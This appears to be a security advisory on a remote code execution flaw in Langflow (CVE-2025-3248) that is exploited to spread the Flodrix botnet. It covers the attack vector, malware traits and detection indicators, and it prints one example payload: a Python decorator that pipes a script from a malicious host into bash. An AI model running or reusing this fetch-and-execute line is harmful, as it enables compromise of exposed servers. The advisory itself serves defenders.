A critical vulnerability in Langflow (CVE-2025-3248) is being actively exploited to deploy the Flodrix botnet, marking a significant threat to AI development infrastructure based on the popular product.
Vulnerability Overview (CVE-2025-3248)
- CVSS Score: 9.8 (Critical) due to unauthenticated remote code execution (RCE)
- Affected Versions: Langflow <1.3.0
Exploitation Vector
- Attackers send malicious POST requests to
/api/v1/validate/codeendpoint - Payloads embedded in Python decorators or function default arguments bypass validation
- Langflow’s use of
ast.parse()andexec()executes code without sandboxing
@exec("import os; os.system('curl http://malicious.site/flodrix.sh | bash')")<br>def fake_validation():<br>passThis writes a file or executes commands during AST processing.
Stealth Features
- Self-deletes unless specific parameters met
- XOR-based obfuscation for C&C communication (TCP/Tor)
- Process masquerading (e.g., renaming to
watchdog)
Attack Capabilities
- Multi-vector DDoS (TCPRaw, UDPPlain, TS3)
- Environment variable dumping and lateral movement
- Checks for
.system_idlefiles to avoid reinfection - Sends “KILLDETAIL” UDP alerts when terminating processes
Current Threat Landscape
- Exploitation Activity: 370+ attacker IPs observed since May 2025, targeting 1,600+ exposed Langflow instances
- Malware Pedigree: Evolved from LeetHozer botnet with enhanced evasion and encryption
- Initial Access: Attackers use Shodan/FOFA scans and public PoC exploits
Detection Measures
Monitor for docker script downloads and connections to 80.66.75.121:25565 and hunt for child processes named watchdog or systemd.
